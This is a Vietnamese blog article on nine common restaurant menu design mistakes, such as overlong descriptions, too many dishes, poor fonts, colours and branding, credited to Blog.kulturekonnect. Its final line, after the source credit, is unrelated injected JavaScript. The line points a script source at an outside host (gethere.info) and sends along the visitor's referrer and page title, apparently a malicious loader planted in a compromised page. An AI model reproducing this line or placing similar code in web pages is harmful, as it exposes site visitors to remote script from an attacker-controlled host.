Thiết kế thực đơn nhà hàng, tưởng dễ mà khó?

Thực đơn là một trong những công cụ Marketing quan trọng với bất cứ nhà hàng nào. Nó tạo ra những ảnh hưởng hay ấn tượng đầu tiên với thực khách bằng những kỳ vọng về chất lượng, màu sắc đồ ăn hay đồ uống. Xây dựng thực đơn nhà hàng thành công đòi hỏi một sự hiểu biết sâu sắc về tâm lý khách hàng.

Restaurant_Menu_Design

Mục đích chính của một trình đơn là tạo ra một cái nhìn trực quan hấp dẫn khách hàng, nó cũng sẽ dự báo rằng khách hàng có quan tâm đến nhà hàng của bạn không, khách hàng có hài lòng không và họ có quay trở lại nhà hàng của bạn lần sau không?

Là một phần để mở rộng thương hiệu nhà hàng của bạn, một menu sẽ cần phải được quan tâm đến việc bố trí món ăn, màu sắc, lựa chọn loại và thậm chí chọn khổ giấy. Khi một trình đơn được trình bày cho khách, không chỉ là một giao dịch bán hàng được bắt đầu, mà đó còn là tạo dựng một mối quan hệ. Nó đóng góp quan trọng vào việc tạo ra những trải nghiệm cho khách hàng.

Thật không may, rất nhiều nhà hàng không dành nhiều thời gian và nguồn lực trong nỗ lực tiếp thị tổng thể của họ. Dưới đây là danh sách 9 lỗi thiết kế thực đơn mà chủ nhà hàng hay mắc phải:

#1 Phần mô tả thực đơn dài và khó hiểu

Phần giới thiệu thực đơn phải nhận được sự quan tâm của khách hàng. Các mô tả ngắn và chính xác tạo ra một hình ảnh trong tâm trí khách về giá trị của những món ăn mà họ đang nhận được. Mô tả quá dài khiến khách hàng mất quá nhiều không gian để đọc và gây nhầm lẫn cho khách. Hãy sử dụng một số từ ngữ nhấn mạnh, có sức ảnh hưởng lớn đến suy nghĩ của khách hàng thay vì là sử dụng từ ngữ một cách tràn lan.

#2 Thực đơn có quá nhiều món

too_many_items_in_restaurant_menu-1

Một thực đơn quá nhiều món có thể gây áp lực và những đắn đo trong lựa chọn của khách hàng. Nó cũng gây ra những khó khăn cho nhà hàng trong việc đặt cấu trúc, phân nhóm và kiểm soát món. Một thực đơn nhiều món sẽ khiến cho khối lượng công việc hằng ngày tăng cao và nó sẽ nguy hiểm nếu như nhà hàng của bạn không chuẩn bị sẵn những nguyên liệu để tạo ra những món ăn mới, gây thất vọng đối với khách hàng. Thực tế, bạn có thành phần để tạo ra 100 món nhưng nó không có nghĩa là bạn phải có tất cả chúng trong thực đơn của mình.

#3 Bảng giá

Bảng giá có thể là một trong những sai lầm lớn nhất trong thực đơn nhà hàng của bạn. Mỗi mức giá thường được xác định với một đường chấm dài bên trái. Một danh sách giá đơn giản sẽ khiến khách hàng dễ quan sát và lựa chọn món.

#4  Sử dụng quá nhiều dấu đô la (đơn vị tiền tệ khác)

Ký hiệu đô la (đơn vị tiền tệ khác) sử dụng quá nhiều, với tần suất dày đặc sẽ tạo khó chịu cho người xem, không phải là về thực phẩm hay không gian quán mà là bởi khách hàng cảm thấy một sự bắt buộc và không được thoải mái khi nghĩ đến sau khi thưởng thức món ăn xong là đến phần thanh toán.

#5 Lượng mặt hàng quá tải

restaurant_menu_overmerchandising

Nhà hàng thường có một vài mặt hàng mà họ muốn giới thiệu nhiều hơn đến khách hàng. Đó có thể là một mặt hàng mới, một mặt hàng đặc trưng hoặc đơn giản cũng có thể là nó đang được giảm giá. Họ sẽ nhấn mạnh nó hơn khi giới thiệu đến khách hàng. Tuy nhiên, hãy làm nó trở nên tinh tế, đặc biệt với những khách hàng mới. Đó là cách tốt nhất để bạn có được lợi nhuận cao nhất.

#6 Vị trí các mục sắp xếp không hợp lý

restaurant_reading_flow

Nhiều nhà hàng không nghĩ nhiều đến việc làm thế nào để đặt và sắp xếp các mặt hàng trên thực đơn của họ. Trong nhiều trường hợp, phần và vị trí mục cũng như lưu lượng đọc lại có thể quyết định đến suy nghĩ và lựa chọn của khách hàng.

Có một vài cách khác nhau để duy trì dòng đọc hợp lý cho thực đơn của bạn, và những gì bạn nên áp dụng phụ thuộc vào cách nghiên cứu của bạn về đối tượng khách hàng.

#7 Không có thương hiệu

Thương hiệu là một tài sản quan trọng nhất nhà hàng của bạn và nó nên được dịch sang tất cả và bất kỳ tài liệu tiếp thị và sáng kiến bạn sử dụng, bao gồm cả thực đơn. Thật không may, rất nhiều nhà hàng dừng lại ở việc phát triển một logo và không xem xét các tác động của việc thiếu một thương hiệu toàn diện cho việc nhận thức về danh tiếng của họ.

Thương hiệu không chỉ đơn giản là để đặt một biểu tượng ở phía trên cùng của thực đơn. Nó cần được cân nhắc về các yếu tố như màu sắc, kiểu/lựa chọn font chữ, hình ảnh minh họa và nhiều hơn thế nữa.

#8 Font chữ thực đơn quá xấu

Phông chữ trên thực đơn có ảnh hưởng lớn đến cái nhìn tổng thể của khách hàng cho lần đầu tiên. Một phông chữ đơn giản có thể khiến khách hàng nghĩ bạn không thực sự đầu tư cho thực đơn khiến họ chẳng còn hứng thú nhìn vào nó để lựa chọn món ăn. Ngược lại, phông chữ quá rối cũng gây khó khăn cho khách hàng. Hãy lựa chọn một phông chữ rõ ràng mặt chữ, đủ lớn để khách hàng đọc được và đặc biệt nó phải đẹp & phù hợp với phong cách thực đơn đó như kiểu phông chữ đậm, nghiêng hay là một kiểu vẽ tay.

#9  Màu sắc và yếu tố thiết kế

bad_colors

Bảng màu sắc trên thực đơn nên chủ yếu đến từ thương hiệu của bạn. Tuy nhiên, bạn nên có sự sáng tạo trong những hiệu ứng màu sắc để tạo sự hứng thú, ngon miệng cho khách hàng khi họ cầm thực đơn lên. Những màu sắc sử dụng đúng sẽ tạo ra một truyền tải cá tính, làm tăng cảm giác thèm ăn và sự chú ý đến các món ăn.

Một số thực đơn sử dụng hình ảnh minh họa, nhiếp ảnh và thiết kế các yếu tố khác để giúp tăng tính trực quan. Thật không may, một số nhà hàng có xu hướng sử dụng các bức ảnh chất lượng thấp làm giảm đi cái nhìn tổng thể thực đơn cho khách hàng.

Kết luận

Trong nhiều trường hợp, sự sợ hãi thay đổi lớn hơn nhiều so với thách thức thực tế về thời gian và nguồn lực đầu tư để có một trình đơn được thiết kế tốt. Hãy suy nghĩ về thực đơn nhà hàng của bạn như là một khoản đầu tư và một cơ hội để tăng doanh thu.

Cuối cùng, bạn không cần phải làm điều đó một mình. Vì vậy, hãy chắc chắn bạn đang sở hữu hoặc thuê một đội ngũ thiết kế chuyên nghiệp. Bạn đang trả tiền cho họ để dành nhiều thời gian vào thương hiệu của mình và đặc biệt chú ý đến tất cả các chi tiết đó sẽ cho phép bạn có thể tối đa hóa lợi ích của nhà hàng.

(Nguồn: Blog.kulturekonnect)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;